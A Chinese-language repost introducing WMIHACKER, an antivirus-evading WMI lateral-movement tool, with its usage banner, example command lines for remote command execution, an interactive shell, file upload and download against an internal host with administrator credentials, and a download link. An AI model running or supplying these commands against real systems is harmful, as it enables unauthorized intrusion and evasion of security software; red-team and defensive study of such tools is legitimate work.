项目介绍
免杀横向渗透远程命令执行,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出WMIHACKER免杀横向移动测试工具。(无需445端口)
主要功能
1、命令执行
2、文件上传
3、文件下载
4、PTH使用
工具使用
C:UsersadministratorDesktop>cscript //nologo WMIHACKER_0.6.vbs__ ____ __ _____ _ _ _____ _ ________ _____/ / / |_ _| | | | | / / ____| |/ / ____| __/ / /| / | | | | |__| | / | | | ' /| |__ | |__) |/ / / | |/| | | | | __ | / / | | | < | __| | _ // / | | | |_| |_ | | | |/ ____ |____| . | |____| |/ / |_| |_|_____| |_| |_/_/ ______|_|_______|_| _v0.6beta By. Xiangshan@360RedTeamUsage:WMIHACKER.vbs /cmd host user pass command GETRES?WMIHACKER.vbs /shell host user passWMIHACKER.vbs /upload host user pass localpath remotepathWMIHACKER.vbs /download host user pass localpath remotepath/cmd single command modehost hostname or IP addressGETRES? Res Need Or Not, Use 1 Or 0command the command to run on remote host
有命令回显执行方式
cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1无命令回显方式:
cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:1.txt" 0模拟shell模式
cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator "Password!" 文件上传-复制本机calc.exe到远程主机c:calc.exe
cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator "Password!" "c:windowssystem32calc.exe" "c:calc"文件下载-下载远程主机calc.exe到本地c:calc.exe
cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator "Password!" "c:calc" "c:windowssystem32calc.exe" 免责声明
由于传播、利用此工具提供的功能而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本人不为此承担任何责任
下载地址
https://github.com/rootclay/WMIHACKER/tree/master
原文始发于微信公众号(七芒星实验室):WMIHACKER:免杀横向移动命令执行测试工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论